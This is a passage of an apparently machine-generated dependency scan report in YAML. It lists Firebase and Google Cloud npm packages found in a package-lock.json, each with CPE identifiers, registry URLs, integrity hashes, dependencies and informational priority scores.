- cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app-check-interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check_interop:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app-check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/app-check-interop-types@0.3.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz
integrity: sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: efa61bee7bbbbcb1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/app-types 0.9.2'
title: '@firebase/app-types 0.9.2'
description: 'Package discovered: @firebase/app-types 0.9.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a5bfafbacd41f0a2
name: '@firebase/app-types'
version: 0.9.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app-types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_types:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app-types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app:\@firebase\/app_types:0.9.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/app-types@0.9.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz
integrity: sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 222f117f0d2bd962
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/auth-interop-types 0.2.3'
title: '@firebase/auth-interop-types 0.2.3'
description: 'Package discovered: @firebase/auth-interop-types 0.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9b3141b15843b5a9
name: '@firebase/auth-interop-types'
version: 0.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth-interop-types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth_interop_types:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth-interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth_interop:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth-interop-types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/auth:\@firebase\/auth_interop_types:0.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/auth-interop-types@0.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz
integrity: sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 89a01c3b3491a5d7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/component 0.6.9'
title: '@firebase/component 0.6.9'
description: 'Package discovered: @firebase/component 0.6.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 23f944b79804e251
name: '@firebase/component'
version: 0.6.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/component:\@firebase\/component:0.6.9:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/component@0.6.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz
integrity: sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q==
dependencies:
'@firebase/util': 1.10.0
tslib: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ac38e7507aa172f9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/database 1.0.8'
title: '@firebase/database 1.0.8'
description: 'Package discovered: @firebase/database 1.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 49e5593cb4d5046f
name: '@firebase/database'
version: 1.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database:1.0.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/database@1.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz
integrity: sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg==
dependencies:
'@firebase/app-check-interop-types': 0.3.2
'@firebase/auth-interop-types': 0.2.3
'@firebase/component': 0.6.9
'@firebase/logger': 0.4.2
'@firebase/util': 1.10.0
faye-websocket: 0.11.4
tslib: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ed006e6af38f061f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/database-compat 1.0.8'
title: '@firebase/database-compat 1.0.8'
description: 'Package discovered: @firebase/database-compat 1.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2a2bae4730b1aafc
name: '@firebase/database-compat'
version: 1.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database-compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database_compat:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_compat:1.0.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/database-compat@1.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz
integrity: sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg==
dependencies:
'@firebase/component': 0.6.9
'@firebase/database': 1.0.8
'@firebase/database-types': 1.0.5
'@firebase/logger': 0.4.2
'@firebase/util': 1.10.0
tslib: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 04162de267eec152
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/database-types 1.0.5'
title: '@firebase/database-types 1.0.5'
description: 'Package discovered: @firebase/database-types 1.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 67e400eb3f7a92f4
name: '@firebase/database-types'
version: 1.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database-types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database_types:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database-types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/database:\@firebase\/database_types:1.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/database-types@1.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz
integrity: sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ==
dependencies:
'@firebase/app-types': 0.9.2
'@firebase/util': 1.10.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7028a090c3339aad
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/logger 0.4.2'
title: '@firebase/logger 0.4.2'
description: 'Package discovered: @firebase/logger 0.4.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fdb02e46c7ca0cd4
name: '@firebase/logger'
version: 0.4.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/logger:\@firebase\/logger:0.4.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40firebase/logger@0.4.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz
integrity: sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A==
dependencies:
tslib: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 98e9db7b5ca2c98a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/util 1.10.0'
title: '@firebase/util 1.10.0'
description: 'Package discovered: @firebase/util 1.10.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6fc2f98e01b8bb45
name: '@firebase/util'
version: 1.10.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:google:firebase\/util:1.10.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/%40firebase/util@1.10.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz
integrity: sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ==
dependencies:
tslib: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ac959c0aec00c93e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @google-cloud/firestore 7.11.6'
title: '@google-cloud/firestore 7.11.6'
description: 'Package discovered: @google-cloud/firestore 7.11.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 352073d173d9984f
name: '@google-cloud/firestore'
version: 7.11.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/%40google-cloud/firestore@7.11.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz
integrity: sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw==
dependencies:
'@opentelemetry/api': ^1.3.0
fast-deep-equal: ^3.1.1
functional-red-black-tree: ^1.0.1
google-gax: ^4.3.3
protobufjs: ^7.2.6
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f729f15026a15114
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @google-cloud/paginator 5.0.2'
title: '@google-cloud/paginator 5.0.2'
description: 'Package discovered: @google-cloud/paginator 5.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e1f90862acd15bdd
name: '@google-cloud/paginator'
version: 5.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40google-cloud/paginator@5.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz
integrity: sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==
dependencies:
arrify: ^2.0.0
extend: ^3.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 13de8663f3cca980
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @google-cloud/projectify 4.0.0'
title: '@google-cloud/projectify 4.0.0'
description: 'Package discovered: @google-cloud/projectify 4.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: aae37aa20c3046f6
name: '@google-cloud/projectify'
version: 4.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40google-cloud/projectify@4.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz
integrity: sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f473f0a74b429a34
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @google-cloud/promisify 4.0.0'
title: '@google-cloud/promisify 4.0.0'
description: 'Package discovered: @google-cloud/promisify 4.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3927becf19e34873
name: '@google-cloud/promisify'
version: 4.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40google-cloud/promisify@4.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz
integrity: sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5c9bae4ce6812dd2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @google-cloud/storage 7.19.0'
title: '@google-cloud/storage 7.19.0'
description: 'Package discovered: @google-cloud/storage 7.19.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cefeafe40657f94b
name: '@google-cloud/storage'
version: 7.19.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@google-cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google-cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google_cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@google:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40google-cloud/storage@7.19.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz
integrity: sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ==
dependencies:
'@google-cloud/paginator': ^5.0.0
'@google-cloud/projectify': ^4.0.0
'@google-cloud/promisify': <4.1.0
abort-controller: ^3.0.0
async-retry: ^1.3.3
duplexify: ^4.1.3
fast-xml-parser: ^5.3.4
gaxios: ^6.0.2
google-auth-library: ^9.6.3
html-entities: ^2.5.2
mime: ^3.0.0
p-limit: ^3.0.1
retry-request: ^7.0.0
teeny-request: ^9.0.0
uuid: ^8.0.0
compliance:
cisControlsV8_1: *id010
